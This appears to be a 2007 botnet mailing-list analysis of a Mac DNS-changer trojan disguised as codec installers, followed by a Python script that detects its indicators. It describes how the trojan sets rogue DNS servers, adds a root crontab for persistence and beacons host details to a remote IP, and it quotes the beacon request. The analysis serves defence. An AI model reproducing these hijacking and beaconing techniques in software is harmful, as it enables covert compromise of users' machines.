To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ----------
I've analyzed two variants of this trojan, procoded1000.dmg and ultracodec1000.dmg, provided to me by Chris (thanks, Chris!).
These trojans basically consist of three scripts and a browser plugin (used by Safari / Firefox? I'm not sure.). On the disk image:

- install.pkg/Contents/Resources/post{install,upgrade} are the same script
- install.pkg/Contents/Resources/pre{install,upgrade} are the same script
- plugins.settings (from Archive.pax.gz, located in install.pkg/Contents) is the same as the above preinstall scripts

The only difference between the two packages appears to be the DNS servers:

procodec1000:   s1=85.255.116.61  s2=85.255.112.103
ultracodec1000: s1=85.255.115.34  s2=85.255.112.158

- The preinstall scripts (and plugins.settings from Archive.pax.gz, which is the same) set the compromised machine's DNS to the above servers (depending on which trojan is installed). In addition, it tries to set a crontab for root that executes itself (as /Library/Internet Plug-Ins/plugins.settings) once a minute.

- The postinstall scripts execute sendreq (found in Archive.pax.gz), and then remove sendreq. sendreq sends 'mac;<cpu type>;<hostname>' as a base64-encoded argument to the 'Accept-Language' header to 85.255.121.37. Example:

    GET / HTTP/1.1
    Accept-Language: bWFjO3Vua25vd247ZXJpYWRvcg==
    Host: 85.255.121.37

- Installs /Library/Internet Plug-Ins/Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin. I'm not certain what this does. There's not much by way of suspicious strings in this executable, and I don't have a way to safely execute it to watch what it does.

Interesting strings (for antivirus or overly suspicious sysadmins :) ):

install.pkg/Contents/Resources/English.lproj/Description.plist:
    <string>Its a suppa puppa desc yo</string>

In Archive.pax.gz:
Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak:
    Verified RoveSupa Plugin
Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE:
    Verified RoveSupa Plugin

On Sun, Nov 04, 2007 at 09:11:03AM -0500, Chris Lee babbled thus:
> Sure, I saved a couple copies. I'll send you a link in a second email. If
> anyone else is interested in a copy, please let me know.

--
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net
Unsolicited advertisements sent to this address are NOT welcome.
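The indicators in the message above (the two rogue resolver pairs, the base64 beacon in the Accept-Language header to 85.255.121.37, and the root crontab entry for /Library/Internet Plug-Ins/plugins.settings) are enough to write a small host/proxy-side checker. The Python below is an added example, not code from the post or from the trojan itself: it decodes the beacon from a captured HTTP request, compares configured resolvers against the IPs listed in the post, and greps a crontab dump for the payload path. The resolver list is exactly the addresses given above and nothing else; the beacon request is the one shown in the post, while the benign request and the crontab line are constructed samples (the post does not show the actual cron line, only that it runs the script once a minute).

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

# Indicators taken from the post: rogue resolvers per variant and the beacon host.
ROGUE_DNS_SERVERS = {
    "85.255.116.61", "85.255.112.103",   # procodec1000
    "85.255.115.34", "85.255.112.158",   # ultracodec1000
}
BEACON_HOST = "85.255.121.37"
CRON_PAYLOAD = "/Library/Internet Plug-Ins/plugins.settings"

# sendreq sends 'mac;<cpu type>;<hostname>' base64-encoded in Accept-Language.
_BEACON_RE = re.compile(r"^mac;([^;]*);([^;]*)$")
_B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def decode_beacon(accept_language: str) -> Optional[Tuple[str, str, str]]:
    """Return (os, cpu_type, hostname) if the header value is the sendreq
    beacon, otherwise None. A normal value like 'en-US,en;q=0.8' is rejected
    before any decoding is attempted."""
    token = accept_language.strip()
    if not _B64_RE.fullmatch(token):
        return None
    try:
        decoded = base64.b64decode(token, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None
    m = _BEACON_RE.match(decoded)
    if not m:
        return None
    return ("mac", m.group(1), m.group(2))


def scan_http_request(raw: str) -> Optional[Dict[str, object]]:
    """Parse a raw HTTP request; return a finding if it carries the beacon
    or talks to the known beacon host, else None."""
    lines = raw.strip().splitlines()
    if not lines:
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    beacon = decode_beacon(headers.get("accept-language", ""))
    host = headers.get("host", "")
    if beacon is None and host != BEACON_HOST:
        return None
    return {"host": host, "beacon": beacon, "known_c2": host == BEACON_HOST}


def check_resolvers(resolvers: List[str]) -> List[str]:
    """Return the configured resolvers that match the rogue servers from the post."""
    return sorted(set(resolvers) & ROGUE_DNS_SERVERS)


def check_crontab(crontab_text: str) -> List[str]:
    """Return crontab lines that execute the plugins.settings payload."""
    return [line for line in crontab_text.splitlines() if CRON_PAYLOAD in line]


# Sample inputs. The first request is the one quoted in the post; the second
# request and the crontab dump are constructed for this example.
SAMPLE_BEACON_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Accept-Language: bWFjO3Vua25vd247ZXJpYWRvcg==\r\n"
    "Host: 85.255.121.37\r\n"
)
SAMPLE_BENIGN_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "Accept-Language: en-US,en;q=0.8\r\n"
)
SAMPLE_CRONTAB = (
    "# constructed root crontab\n"
    "0 3 * * * /usr/sbin/periodic daily\n"
    '* * * * * "/Library/Internet Plug-Ins/plugins.settings"\n'
)

if __name__ == "__main__":
    print(scan_http_request(SAMPLE_BEACON_REQUEST))
    print(scan_http_request(SAMPLE_BENIGN_REQUEST))
    print(check_resolvers(["8.8.8.8", "85.255.116.61"]))
    print(check_crontab(SAMPLE_CRONTAB))
```

On a real host the resolver list would come from `scutil --dns` or `networksetup -getdnsservers`, and the crontab dump from `crontab -u root -l`; the functions take plain strings so they can be fed from either.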
All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets